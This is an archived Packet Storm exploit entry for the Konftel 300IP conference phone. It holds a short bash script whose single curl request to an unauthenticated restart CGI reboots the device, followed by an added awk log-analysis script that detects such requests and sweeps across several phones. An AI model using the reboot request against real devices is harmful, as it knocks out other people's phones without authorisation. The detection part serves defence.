Konftel 300IP 2.1.2 Reboot Bypass

2013-03-27T00:00:00
ID PACKETSTORM:120974
Type packetstorm
Reporter Todor Donev
Modified 2013-03-27T00:00:00

Description

                                        
```bash
#!/bin/bash
# Konftel 300IP SIP-based Conference phone <= 2.1.2 remote bypass reboot exploit
#
# by Todor Donev / 03.2013 / Sofia,Bulgaria
# email: todor dot donev at gmail com
# type: hardware
#
# The Konftel 300IP is a flexible SIP-based conference phone,
# perfect for companies that use IP voice services. Its clear,
# natural sound comes from OmniSound HD, Konftel’s patented
# wideband audio technology. The stylishly designed
# Konftel 300IP is packed with intelligent features for more
# efficient conference calls. Record and store meetings on a
# SD memory card. Use the conference guide to call
# pre-programmed groups with just a few simple pushes of a
# button. Conveniently import and export contact details via
# the Web interface. Create your own phone book with the
# personal user profile feature. The Konftel 300IP is also
# ideal for larger conferences since it can accommodate
# expansion microphones, an external wireless headset and a
# PA system. With the Konftel 300IP your company will have
# a conference phone that combines all the benefits of IP
# voice service with innovative new features.
#
# Example usage:
# [exploits@amnesium]$ ./k300IP-rbr.sh 192.168.1.180
# Konftel 300IP SIP-based Conference phone <= 2.1.2 remote bypass reboot exploit
# Rebooting 192.168.1.180..
# Sleeping 30 secs, before rebooting
# curl: (7) couldn't connect to host
#
# Special greetings for Tsvetelina Emirska, Stilyan Angelov and all my other friends!

# Require exactly one argument: the address of the phone.
if [ $# != 1 ]; then
    echo "usg: $0 <victim>"
    exit
fi
echo "Konftel 300IP SIP-based Conference phone <= 2.1.2 remote bypass reboot exploit"
echo "Rebooting $1.."
# Request the restart CGI; the request carries no credentials.
# The URL is quoted so the shell does not treat '?' as a glob character.
curl "http://$1/cgi-bin/dorestart.cgi?doit=Reboot" &>/dev/null
echo "Sleeping 30 secs before rebooting"
sleep 30
# Probe the web interface again; a connection error means the phone is down.
curl "$1"
```
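For detection, the request the script sends can be matched in HTTP logs. The following is an added example, not part of the original advisory: it assumes logs from a reverse proxy or HTTP sensor in front of the phones, in Apache common log format with the target host prepended, and the management-host allowlist and sample log lines are constructed for illustration.

```bash
#!/bin/bash
# Added example: report clients outside a management allowlist that requested
# the reboot CGI used by the script above.
# Assumed log layout (hypothetical sensor/proxy, not the phone's own log):
#   target client ident user [date tz] "METHOD path PROTO" status bytes

# Constructed sample log lines, private addresses only.
sample_log() {
cat <<'EOF'
192.168.1.180 192.168.1.20 - - [27/Mar/2013:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 5120
192.168.1.180 192.168.1.77 - - [27/Mar/2013:10:05:40 +0000] "GET /cgi-bin/dorestart.cgi?doit=Reboot HTTP/1.1" 200 312
192.168.1.181 192.168.1.77 - - [27/Mar/2013:10:05:41 +0000] "GET /cgi-bin/dorestart.cgi?doit=Reboot HTTP/1.1" 200 312
192.168.1.180 192.168.1.77 - - [27/Mar/2013:10:09:12 +0000] "GET /cgi-bin/dorestart.cgi?x=1&doit=Reboot HTTP/1.1" 200 312
192.168.1.180 192.168.1.20 - - [27/Mar/2013:11:00:00 +0000] "GET /cgi-bin/dorestart.cgi?doit=Reboot HTTP/1.1" 200 312
192.168.1.181 192.168.1.90 - - [27/Mar/2013:11:30:00 +0000] "GET /cgi-bin/dorestart.cgi HTTP/1.1" 200 298
EOF
}

# $1 = space-separated allowlist of management hosts; log lines on stdin.
# Prints one line per offending client: "client requests distinct_phones".
find_reboot_requests() {
    awk -v allow="$1" '
        BEGIN {
            cgi = "/cgi-bin/dorestart.cgi?"
            n = split(allow, a, " ")
            for (i = 1; i <= n; i++) ok[a[i]] = 1
        }
        {
            # Field 8 is the request path; it must start with the CGI and a query.
            if (index($8, cgi) != 1) next
            # Look for doit=Reboot at any position in the query string.
            nq = split(substr($8, length(cgi) + 1), q, "&")
            found = 0
            for (i = 1; i <= nq; i++) if (q[i] == "doit=Reboot") found = 1
            if (!found || ($2 in ok)) next
            reqs[$2]++
            # Count each (client, phone) pair once to expose sweeps.
            if (!(($2, $1) in seen)) { seen[$2, $1] = 1; phones[$2]++ }
        }
        END { for (c in reqs) print c, reqs[c], phones[c] }
    ' | sort
}

sample_log | find_reboot_requests "192.168.1.20"
```

A client that reboots several phones in a short window shows up with a distinct_phones count above one, which separates a sweep from a single administrative restart.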